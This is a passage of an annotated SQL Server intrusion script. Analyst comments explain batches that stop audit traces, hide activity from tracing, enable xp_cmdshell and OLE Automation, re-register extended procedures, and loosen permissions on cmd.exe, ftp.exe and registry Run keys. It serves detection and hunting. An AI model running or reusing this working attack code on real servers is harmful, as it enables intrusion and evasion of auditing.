@passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe cacls.exe /e /t /g system:F';
  473. go
  -- Analyst note: deletes the Default User Internet Explorer cache folder (Content.IE5)
  -- through Scripting.FileSystemObject. Presumably cleanup of downloaded artefacts -- verify
  -- against file-system timelines.
  -- The trailing "--sp_password" comment is itself an indicator: SQL Server tracing masks the
  -- text of events that contain the string sp_password, so the batch text is missing from
  -- trace output. Alert on masked trace events that do not line up with a real password change.
  474. declare @aa int
  475. exec sp_oacreate 'scripting.filesystemobject', @aa out
  476. exec sp_oamethod @aa, 'DeleteFolder',null,'c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5';
  477. --sp_password
  478. go
  479.  
  -- Analyst note: audit tampering. sp_trace_setstatus with status 0 stops a server-side trace
  -- and status 2 closes it and deletes its definition. The first batch stops trace id 1 only
  -- when @@version reports SQL Server 2000; the next two batches stop and then delete trace id 2.
  -- Defender check: compare the running traces (sys.traces, fn_trace_getinfo) with the expected
  -- baseline and treat an unexplained stop of an audit trace as an incident signal.
  480. if(@@version like 'Microsoft SQL Server  2000%')
  481. exec sp_trace_setstatus 1, 0;
  482. go
  483. exec sp_trace_setstatus 2, 0;
  484. go
  485. exec sp_trace_setstatus 2, 2;    
  486.  
  487. go
  -- Analyst note: switches on two surface-area options that are disabled by default on current
  -- SQL Server versions: 'Ad Hoc Distributed Queries' (required by the OPENROWSET calls used
  -- elsewhere in this paste) and 'xp_cmdshell' (operating-system command execution).
  -- Defender check: review sys.configurations for both options, looking at value and
  -- value_in_use; sp_configure changes are also written to the SQL Server error log.
  -- Mitigation: keep both options at 0 and do not let application logins hold sysadmin.
  488. use master  
  489. exec sp_configure 'show advanced options',1;
  490. exec sp_configure 'Ad Hoc Distributed Queries',1;
  491.          
  492. go
  493. use master  
  494. EXEC sp_configure 'show advanced options', 1;
  495. RECONFIGURE;
  496. EXEC sp_configure 'xp_cmdshell', 1;
  497. RECONFIGURE;              
  498.  
  499. go
  -- Analyst note: drops sp_addextendedproc and sp_dropextendedproc in master and recreates them
  -- as thin wrappers over DBCC addextendedproc / DBCC dropextendedproc. Each wrapper raises
  -- error 15002 and returns 1 when called inside a transaction, otherwise runs the DBCC command
  -- and returns 0. The drop wrapper accepts @dllname but does not use it.
  -- Presumably this restores procedures that an administrator removed as hardening -- verify.
  -- Defender check: objects in master that carry system-procedure names but have recent
  -- create/modify dates or a non-system owner.
  500. use master  
  501. DROP PROCEDURE sp_addextendedproc;
  502. DROP PROCEDURE sp_dropextendedproc;
  503.  
  504. go
  505. create procedure sp_addextendedproc
  506. @functname nvarchar(517), @dllname varchar(255) as
  507. set implicit_transactions off
  508. if @@trancount > 0
  509. begin
  510. raiserror(15002,-1,-1,'sp_addextendedproc')
  511. return (1)
  512. end
  513. dbcc addextendedproc( @functname, @dllname)
  514. return (0)
  515.  
  516. go  
  517. create procedure dbo.sp_dropextendedproc
  518. @functname nvarchar(517), @dllname varchar(255) as
  519. set implicit_transactions off  
  520. if @@trancount > 0  
  521. begin  
  522. raiserror(15002,-1,-1,'sys.sp_dropextendedproc')  
  523. return (1)  
  524. end    
  525. dbcc dropextendedproc( @functname )  
  526. return (0)
  527.  
  528. go  
  -- Analyst note: unregisters xp_cmdshell with DBCC dropextendedproc, then drops the OLE
  -- Automation, registry (xp_reg*), directory-listing and web-task procedures by name.
  -- Later batches in this paste register the same names again against odsole70.dll,
  -- xpstar.dll and xplog70.dll, so this looks like a reset before re-registration -- confirm.
  -- Hunting: DROP PROCEDURE / DBCC dropextendedproc against xp_* and sp_OA* names in master.
  529. dbcc dropextendedproc ("xp_cmdshell")
  530.  
  531. go  
  532. drop PROCEDURE sp_OACreate
  533. drop PROCEDURE xp_cmdshell  
  534. drop PROCEDURE xp_dirtree  
  535. drop PROCEDURE sp_oamethod  
  536. drop PROCEDURE xp_regaddmultistring  
  537. drop PROCEDURE xp_regdeletekey  
  538. drop PROCEDURE xp_regdeletevalue  
  539. drop PROCEDURE xp_regenumvalues  
  540. drop PROCEDURE xp_regread  
  541. drop PROCEDURE xp_regwrite  
  542. drop PROCEDURE xp_makewebtask
  543.  
  544. go  
  -- Analyst note: enables 'Ole Automation Procedures' (the sp_OA* family used throughout this
  -- paste) and 'xp_cmdshell'. The first batch applies the change with RECONFIGURE WITH OVERRIDE
  -- and then sets 'show advanced options' back to 0; the following batches repeat the same
  -- settings with plain RECONFIGURE.
  -- Defender check: both options should read 0 in sys.configurations on a hardened server;
  -- a change to 1 outside a change window warrants review of the login that made it.
  545. USE master;  
  546. EXEC sp_configure 'show advanced options', 1;
  547. RECONFIGURE WITH OVERRIDE;  
  548. EXEC sp_configure 'Ole Automation Procedures', 1;  
  549. RECONFIGURE WITH OVERRIDE;  
  550. EXEC sp_configure 'show advanced options', 0;
  551.  
  552. go  
  553. EXEC sp_configure 'show advanced options', 1;
  554. RECONFIGURE;
  555.  
  556. go  
  557. EXEC sp_configure 'Ole Automation Procedures', 1;
  558. RECONFIGURE;  
  559.  
  560. go
  561. EXEC sp_configure 'xp_cmdshell', 1;
  562. RECONFIGURE;  
  563.  
  564. go  
  -- Analyst note: registers extended stored procedures in master through sp_addextendedproc,
  -- each mapped to one of three DLL names: xpstar.dll (directory, drive, error-log and xp_reg*
  -- registry procedures), xplog70.dll (xp_enumgroups, xp_loginconfig) and odsole70.dll (the
  -- sp_OA* OLE Automation procedures).
  -- Defender check: inventory extended procedures and their DLL mappings in master and compare
  -- with a known-good build; names re-added after deliberate removal indicate tampering.
  565. use master
  566. exec sp_addextendedproc xp_dirtree,'xpstar.dll'      
  567. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'      
  568. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'      
  569. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'      
  570. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'      
  571. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'      
  572. exec sp_addextendedproc sp_OACreate,'odsole70.dll'      
  573. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'      
  574. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'      
  575. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'      
  576. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'      
  577. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'      
  578. exec sp_addextendedproc sp_OAStop,'odsole70.dll'      
  579. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'      
  580. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'      
  581. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'      
  582. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'      
  583. exec sp_addextendedproc xp_regread,'xpstar.dll'      
  584. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'      
  585. exec sp_addextendedproc xp_regwrite,'xpstar.dll'      
  586. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'  
  587.  
  588. go  
  -- Analyst note: the same re-registration done directly with DBCC, as drop-then-add pairs:
  -- xp_cmdshell -> xplog70.dll; xp_dirtree and the xp_reg* procedures -> xpstar.dll;
  -- sp_OACreate, sp_OAMethod, sp_OASetProperty and sp_OADestroy -> odsole70.dll.
  -- Hunting: DBCC addextendedproc / dropextendedproc in SQL audit data; these commands are
  -- rare in normal operation, so any occurrence is worth attributing to a login and host.
  589. dbcc dropextendedproc ("xp_cmdshell");
  590. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  591. dbcc dropextendedproc ("xp_dirtree");
  592. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  593. dbcc dropextendedproc ("xp_regread");
  594. dbcc addextendedproc ("xp_regread","xpstar.dll");
  595. dbcc dropextendedproc ("xp_regwrite");
  596. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  597. dbcc dropextendedproc ("xp_regdeletekey");
  598. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  599. dbcc dropextendedproc ("xp_regenumkeys");
  600. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  601. dbcc dropextendedproc ("xp_regdeletevalue");
  602. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  603. dbcc dropextendedproc ("sp_OACreate");
  604. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  605. dbcc dropextendedproc ("sp_OAMethod");
  606. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  607. dbcc dropextendedproc ("sp_OASetProperty");
  608. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  609. dbcc dropextendedproc ("sp_OADestroy");
  610. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  611.  
  612. go
  613. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
  614. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")  
  615.  
  616. go  
  617. DROP PROCEDURE sp_OAMethod;DROP PROCEDURE sp_OACreate;
  618. DROP PROCEDURE sp_OASetProperty;
  619. DROP PROCEDURE sp_OADestroy  
  620.  
  621. go
  622. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';
  623. exec sp_addextendedproc sp_OACreate,'odsole70.dll';
  624. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';
  625. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  626.  
  627. go  
  -- Analyst note: xp_regwrite is used to write COM registration data under HKEY_CLASSES_ROOT:
  -- a CLSID value for WScript.Shell, a CLSID value for Scripting.FileSystemObject, and a
  -- description string for Scripting.FileSystemObject. The value-name argument is mis-encoded
  -- in this paste; presumably it was a localized "(Default)" label -- confirm from a clean sample.
  -- Presumably this repairs ProgID-to-CLSID mappings that were removed as hardening -- verify.
  -- Hunting: registry writes under HKCR\WScript.Shell and HKCR\Scripting.FileSystemObject made
  -- by the SQL Server process.
  628. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','WScript.Shell\CLSID','(Ĭ��)','REG_SZ','{72C24DD5-D70A-438B-8A42-98424B88AFB8}'  
  629.  
  630. go  
  631. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','Scripting.FileSystemObject\CLSID','(Ĭ��)','REG_SZ','{0D43FE01-F093-11CF-8940-00A0C9054228}'  
  632.  
  633. go  
  634. EXEC master.dbo.xp_regwrite 'HKEY_CLASSES_ROOT','Scripting.FileSystemObject','(Ĭ��)','REG_SZ','FileSystem Object'  
  635.  
  636. go  
  -- Analyst note: xp_makecab / xp_unpackcab are used as a file-copy mechanism. Each xp_makecab
  -- packs one DLL (odsole70.dll, xplog70.dll or xpstar.dll) from a SQL2KSP4\x86\binn folder on
  -- C:, D: or E: into C:\Windows\System\<n>.Zip; the xp_unpackcab calls extract it into
  -- "Program Files\Microsoft SQL Server\MSSQL\Binn" on C:, D: and E:, or into C:\Windows\System
  -- for xplog70.dll. Presumably this restores extended-procedure DLLs that were deleted as
  -- hardening, using leftover service-pack installation files -- verify.
  -- Indicators: C:\Windows\System\1.Zip through 9.Zip; new or replaced copies of the three
  -- DLLs. Mitigation: remove unpacked service-pack media from database servers.
  637. exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
  638. exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  639. exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  640. exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  641. exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
  642. exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  643. exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  644. exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  645. exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
  646. exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  647. exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  648. exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  649. exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
  650. exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
  651. exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
  652. exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
  653. exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
  654. exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
  655. exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
  656. exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  657. exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  658. exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  659. exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
  660. exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  661. exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  662. exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  663. exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
  664. exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  665. exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  666. exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  667.  
  668. go
  669. if(@@version like 'Microsoft SQL Server  2000%')  
  670. use master;  
  671. else  
  672. exec sp_trace_setstatus 5, 0;  
  673. go
  674. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))drop procedure sp_trace_setstatus
  675. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_addextendedproc]'))drop procedure sp_addextendedproc
  676. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))drop procedure sp_oacreate
  677. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))drop procedure sp_OASetProperty
  678. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
  679. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
  680. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
  681.  
  682. go  
  683. create procedure sp_addextendedproc
  684. @functname nvarchar(517),@dllname varchar(255) as
  685. set implicit_transactions off
  686. if @@trancount > 0
  687. begin
  688. raiserror(15002,-1,-1,'sp_addextendedproc')
  689. return (1)
  690. end
  691. dbcc addextendedproc( @functname, @dllname)
  692. return (0);  
  693.  
  694. go
  695. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))dbcc addextendedproc ('sp_trace_setstatus','odsole70.dll')
  696. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))dbcc addextendedproc ('xp_regwrite','xpstar.dll')
  697. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')
  698. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')
  699. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')
  700. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
  701.  
  702. go
  703. DROP PROCEDURE sp_trace_setstatus;
  704. DROP PROCEDURE xp_regwrite;
  705. DROP PROCEDURE sp_OAMethod;
  706. DROP PROCEDURE sp_OACreate;
  707. DROP PROCEDURE sp_OASetProperty;
  708. DROP PROCEDURE sp_OADestroy
  709. exec sp_addextendedproc sp_trace_setstatus,'odsole70.dll';
  710. exec sp_addextendedproc xp_regwrite,'odsole70.dll';
  711. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';
  712. exec sp_addextendedproc sp_OACreate,'odsole70.dll';
  713. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';
  714. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  715.  
  716. go
  717. ECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  718. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  719. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  720. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''WSHom.Ocx''';
  721. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  722. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  723. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  724.  
  725. go
  726. SELECT @objRet
  727.  
  728. go  
  -- Analyst note: DBCC addextendedproc binds the names DllUnregisterServer and
  -- DllRegisterServer to WSHom.Ocx, each name is executed as an extended procedure, and the
  -- name is dropped again straight afterwards. Presumably this calls the COM self-registration
  -- exports of WSHom.Ocx inside the SQL Server process to re-register the Windows Script Host
  -- objects -- confirm in a sandbox. Later batches repeat this for scrrun.dll and
  -- wbem\wbemdisp.dll.
  -- Hunting: extended procedures mapped to a DLL that is not a SQL Server component, and
  -- short-lived objects named DllRegisterServer / DllUnregisterServer in master.
  729. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  730. dbcc addextendedproc ('DllUnregisterServer','WSHom.Ocx')  
  731. exec DllUnregisterServer  
  732. Drop Procedure DllUnregisterServer  
  733.  
  734. go
  735. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  736. dbcc addextendedproc ('DllRegisterServer','WSHom.Ocx')  
  737. exec DllRegisterServer  
  738. Drop Procedure DllRegisterServer  
  739.  
  740. go
  741. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  742.  
  743.  
  744. go  
  -- Analyst note: Scripting.FileSystemObject creates c:\windows\system32\1025\run.ini and writes
  -- one line to it: the HKLM ...\Windows\CurrentVersion\run key path followed by "[2 8 18]".
  -- The layout resembles a regini.exe permission script; presumably it is input for a regini
  -- run that changes the ACL on the Run key -- no such call appears in this batch, so verify.
  -- The next statement asks ADOX.Catalog to create a Jet database at the relative path
  -- ias\ias.mdb, and the last one drops a procedure named wsp_pwssword if it exists.
  -- Indicators: run.ini under system32\1025; an unexpected ias.mdb; ACL changes on the Run key.
  745. declare @o int, @f int, @t int, @ret int  
  746. exec sp_oacreate 'scripting.filesystemobject', @o out  
  747. exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1  
  748. exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]'  
  749. declare @hr int declare @object int declare @property int exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=ias\ias.mdb'  
  750. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  751.  
  752.  
  753. go  
  754. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  755. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  756. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  757. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''scrrun.dll''';
  758. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  759. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  760. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  761.  
  762. go
  763. SELECT @objRet  
  764.  
  765. go
  766. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  767. dbcc addextendedproc ('DllUnregisterServer','scrrun.dll')  
  768. exec DllUnregisterServer  
  769. Drop Procedure DllUnregisterServer  
  770.  
  771. go
  772. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  773. dbcc addextendedproc ('DllRegisterServer','scrrun.dll')  
  774. exec DllRegisterServer  
  775. Drop Procedure DllRegisterServer
  776.  
  777. go  
  778. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  779. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  780. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  781. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''wbem\wbemdisp.dll''';
  782. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  783. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  784. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  785.  
  786. go
  787. SELECT @objRet  
  788.  
  789. go
  790. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  791. dbcc addextendedproc ('DllUnregisterServer','wbem\wbemdisp.dll')  
  792. exec DllUnregisterServer  
  793. Drop Procedure DllUnregisterServer
  794.  
  795. go
  796. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  797. dbcc addextendedproc ('DllRegisterServer','wbem\wbemdisp.dll')  
  798. exec DllRegisterServer  
  799. Drop Procedure DllRegisterServer  
  800. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
  801.  
  802. go  
  803. DECLARE @objLocator int;DECLARE @objWMIService int;
  804. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  805. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  806. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  807. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cacls.exe''';
  808. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  809. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  810. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  811. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
  812.  
  813. go  
  814. DECLARE @objLocator int;DECLARE @objWMIService int;DECLARE @objRootSecSetting int;
  815. DECLARE @objSecurityDescriptor int;
  816. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  817. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  818. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''C:\Progra~1\Common~1\System\ado\msado15.dll''';
  819. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  820. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  821. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  822. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  823.  
  824. go  
  825. DECLARE @objLocator int;DECLARE @objWMIService int;
  826. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  827. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  828. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  829. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cmd.exe''';
  830. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  831. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  832. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  833. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  834.  
  835. go  
  836. DECLARE @objLocator int;DECLARE @objWMIService int;
  837. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  838. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  839. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  840. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''netsvchosts.exe''';
  841. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  842. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  843. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  844. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  845.  
  846. go  
  847. DECLARE @objLocator int;DECLARE @objWMIService int;
  848. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  849. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  850. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  851. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''reg.exe''';
  852. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  853. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  854. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  855. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  856.  
  857. go  
  858. DECLARE @objLocator int;DECLARE @objWMIService int;
  859. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  860. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  861. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  862. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''ftp.exe''';
  863. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  864. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  865. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  866. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  867.  
  868. go  
  869. DECLARE @objLocator int;DECLARE @objWMIService int;
  870. DECLARE @objRootSecSetting int;
  871. DECLARE @objSecurityDescriptor int;
  872. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  873. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  874. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''p.exe''';
